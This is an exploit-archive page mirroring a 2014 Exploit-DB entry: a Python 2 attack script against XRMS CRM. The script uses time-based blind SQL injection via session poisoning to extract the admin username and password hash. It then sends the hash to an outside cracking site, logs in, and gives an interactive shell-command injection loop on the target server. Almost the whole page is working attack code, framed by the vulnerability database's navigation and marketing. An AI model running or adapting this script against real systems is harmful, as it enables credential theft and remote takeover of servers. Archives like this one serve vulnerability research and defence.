Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

XRms - Blind SQL Injection / Command Execution

🗓️ 28 Aug 2014 00:00:00Reported by Benjamin HarrisType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

XRMS Blind SQL Injection / Command Executio

Code
#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################

import urllib
import urllib2
import time
import sys

usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
	print """	    ____                                      
	   / __/_  ______ _  _  ___________ ___  _____
	  / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
	 / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
	/_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
	             /_/                              
	[+] fuq th3 w0rld, fuq ur m0m!\n"""

def usage():
	print "	[+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
	print "	[+] Example:"
	print "	[+] python " + sys.argv[0] + " domain.to/xrms"
	quit()

def sendhashaway(hash):
	print " [+] Sending hash to icrackhash.com to be cracked."
	data = None
	headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
	url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
	gh = urllib2.Request(url,data,headers)
	gh2 = urllib2.urlopen(gh)
	output = gh2.read()
	plaintext = getpositions(output,'<td><small><strong>','</strong>')
	print " [-] Plaintext of hash: " +plaintext + "\n"
	return plaintext

def username(length):
	length = length + 1
	duser = []
	#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
	found = 0
	i = 1
	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
	payload2 = ",1)=CHAR("
	payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
		found = 0
		while(found != 1):
			for f in range(0,len(userascii)):
				class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
					def http_error_302(self, req, fp, code, msg, headers):
						infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
						infourl.status = code
						infourl.code = code
						return infourl
					http_error_300 = http_error_302    
				class HeadRequest(urllib2.Request):
					def get_method(self):
						return "POST"
				payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
				data = urllib.urlencode([('user_id',payload)])
				url = 'http://'+domain+'/plugins/webform/new-form.php'
				opener = urllib2.build_opener(LeHTTPRedirectHandler)
				req = HeadRequest(url,data)
				prepare = opener.open(req)
				cookie1 = prepare.info()
				cookie2pos1 = str(cookie1).find('PHPSESSID')
				cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
				line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
				line = 'XRMS' + line[9:]
				url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
				headers = { 'Cookie' : line }
				data = None
				start = time.time()
				get = urllib2.Request(url,data,headers)
				get.get_method = lambda: 'HEAD'
				try:
					execute = urllib2.urlopen(get)
				except:
					pass
				elapsed = (time.time() - start)
				if(elapsed > 1):
					print "	Character found. Character is: " + usercharac[f]
					duser.append(usercharac[f])
					found = 1
	return duser

def getusernamelength():
	found = 0
	i = 1
	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
	payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
	while (found != 1): 
		class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
			def http_error_302(self, req, fp, code, msg, headers):
				infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
				infourl.status = code
				infourl.code = code
				return infourl
			http_error_300 = http_error_302    
		class HeadRequest(urllib2.Request):
			def get_method(self):
				return "POST"
		payload = payload1 + str(i) + payload2
		data = urllib.urlencode([('user_id',payload)])
		url = 'http://'+domain+'/plugins/webform/new-form.php'
		opener = urllib2.build_opener(LeHTTPRedirectHandler)
		req = HeadRequest(url,data)
		prepare = opener.open(req)
		cookie1 = prepare.info()
		cookie2pos1 = str(cookie1).find('PHPSESSID')
		cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
		line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
		line = 'XRMS' + line[9:]
		url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
		headers = { 'Cookie' : line }
		data = None
		start = time.time()
		get = urllib2.Request(url,data,headers)
		get.get_method = lambda: 'HEAD'
		try:
			execute = urllib2.urlopen(get)
		except:
			pass
		elapsed = (time.time() - start)
		if(elapsed > 1):
			print "	Length found at position: " + str(i)
			found = 1
			length = i
			return length
		i = i + 1

def password(length):
	length = length + 1
	dpassword = []
	#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
	found = 0
	i = 1
	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
	payload2 = ",1)=CHAR("
	payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
		found = 0
		while(found != 1):
			for f in range(0,len(userascii)):
				class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
					def http_error_302(self, req, fp, code, msg, headers):
						infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
						infourl.status = code
						infourl.code = code
						return infourl
					http_error_300 = http_error_302    
				class HeadRequest(urllib2.Request):
					def get_method(self):
						return "POST"
				payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
				data = urllib.urlencode([('user_id',payload)])
				url = 'http://'+domain+'/plugins/webform/new-form.php'
				opener = urllib2.build_opener(LeHTTPRedirectHandler)
				req = HeadRequest(url,data)
				prepare = opener.open(req)
				cookie1 = prepare.info()
				cookie2pos1 = str(cookie1).find('PHPSESSID')
				cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
				line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
				line = 'XRMS' + line[9:]
				url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
				headers = { 'Cookie' : line }
				data = None
				start = time.time()
				get = urllib2.Request(url,data,headers)
				get.get_method = lambda: 'HEAD'
				try:
					execute = urllib2.urlopen(get)
				except:
					pass
				elapsed = (time.time() - start)
				if(elapsed > 1):
					print "	Character found. Character is: " + usercharac[f]
					dpassword.append(usercharac[f])
					found = 1
	return dpassword

def login(domain,user,password):
	cookie = "XRMS=iseeurgettinown4d"
	url = 'http://'+domain+'/login-2.php'
	headers = { 'Cookie' : cookie }
	data = urllib.urlencode([('username',user),('password',password)])
	a1 = urllib2.Request(url,data,headers)
	a2 = urllib2.urlopen(a1)
	output = a2.read()
	if output.find('PEAR.php') > 0:
		print "	[+] Logged In"

def commandexec(domain,command):
	cookie = "XRMS=iseeurgettinown4d"
	cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
	headers = { 'Cookie' : cookie }
	data = None
	url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
	b1 = urllib2.Request(url,data,headers)
	b2 = urllib2.urlopen(a1)
	output = b2.read()
	first = output.find('0x41') + 4
	last = output.find('14x0') - 4
	return output[first:last]

banner()
if len(sys.argv) < 2:
	usage()
domain = sys.argv[1]
print "	[+] Grabbing username length"
length = getusernamelength()
print "	[+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "	[+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "	[+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
	cmd = raw_input('	[+] Run a command: ')
	if cmd == 'quit':
		print "	[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print "	[+] "+ commandexec(domain,cmd)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Aug 2014 00:00Current
7.4High risk
Vulners AI Score7.4
remote command executionxrms blind sqlicommand injectionsession poisoningsql injection
23